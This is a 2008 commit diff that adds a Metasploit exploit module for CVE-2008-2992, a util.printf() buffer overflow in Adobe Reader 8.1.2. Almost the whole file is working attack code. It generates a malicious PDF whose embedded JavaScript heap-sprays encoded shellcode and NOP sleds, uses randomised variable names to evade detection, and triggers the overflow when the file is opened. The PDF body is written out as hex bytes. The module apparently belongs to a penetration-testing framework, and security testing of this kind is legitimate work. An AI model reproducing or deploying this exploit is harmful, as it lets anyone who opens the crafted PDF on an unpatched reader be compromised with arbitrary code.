added exploit module adobe_utilprintf.rb

git-svn-id: file:///home/svn/framework3/trunk@5995 4d416f70-5f16-0410-b530-b9f4589650da
2008-12-03 16:19:25 +00:00 · 2008-12-03 16:19:25 +00:00 · 381f6da682
parent a8c9397419
commit 381f6da682
1 changed files with 163 additions and 0 deletions
--- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb
+++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb
@ -0,0 +1,163 @@
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/projects/Framework/
+###
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Adobe util.printf() Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 
+					< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
+					entry, an attacker may be able to execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ], 
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[
+					[ 'CVE', '2008-2992' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Adobe Reader v8.1.2', { 'Ret' => '' } ],	
+				],
+			'DisclosureDate' => 'Feb 8 2008',
+			'DefaultTarget'  => 0))
+
+                        register_options(
+                                [
+                                        OptString.new('FILENAME', [ false, 'The file name.',  'msf.pdf']),
+                                        OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
+                                ], self.class)
+
+	end
+
+	def exploit 
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Make some nops
+		nops    = Rex::Text.to_unescape(make_nops(4))
+
+		# Randomize PDF version?
+		ver = 1 + rand(2)
+		
+		build = 1 + rand(7)
+
+		x = ver.to_s + "." + build.to_s
+
+		# Randomize variables
+		rand1  = rand_text_alpha(rand(100) + 1) 
+		rand2  = rand_text_alpha(rand(100) + 1) 
+		rand3  = rand_text_alpha(rand(100) + 1) 
+		rand4  = rand_text_alpha(rand(100) + 1) 
+		rand5  = rand_text_alpha(rand(100) + 1) 
+		rand6  = rand_text_alpha(rand(100) + 1) 
+		rand7  = rand_text_alpha(rand(100) + 1) 
+		rand8  = rand_text_alpha(rand(100) + 1) 
+		rand9  = rand_text_alpha(rand(100) + 1) 
+		rand10 = rand_text_alpha(rand(100) + 1) 
+		rand11 = rand_text_alpha(rand(100) + 1) 
+
+		script = %Q|
+		var #{rand1} = unescape("#{shellcode}");
+		var #{rand2} ="";
+		for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+		#{rand4} = #{rand2} + #{rand1};
+		#{rand5} = unescape("#{nops}");
+		#{rand6} = 20;
+		#{rand7} = #{rand6}+#{rand4}.length
+		while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
+		#{rand8} = #{rand5}.substring(0, #{rand7});
+		#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
+		while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
+		#{rand10} = new Array();
+		for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
+		util.printf("%45000.45000f", 0);
+					|
+		
+		# Create the pdf
+		pdf =  "\x25\x50\x44\x46\x2d" + x + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
+		pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
+		pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
+		pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
+		pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
+		pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
+		pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
+		pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
+		pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
+		pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
+		pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
+		pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
+		pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
+		pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
+		pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
+		pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
+		pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
+		pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
+		pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
+		pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
+		pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
+		pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+		pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
+		pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+		pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
+		pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
+		pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
+		pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
+		pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
+		pdf << "\x65"
+		pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
+		pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
+		pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
+		pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
+		pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
+		pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
+		pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
+		pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
+		pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
+		pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
+		pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
+		pdf << script
+		pdf << "\x0a\x0a\x0a"
+		pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x78\x72\x65"
+		pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
+		pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
+		pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
+		pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
+		pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
+		pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
+		pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
+		pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
+		pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
+		pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
+		pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
+		pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
+		pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a\x33\x36\x32\x39"
+		pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"
+
+		print_status("Creating '#{datastore['FILENAME']}' file...") 
+
+		file_create(pdf)
+	end
+
+end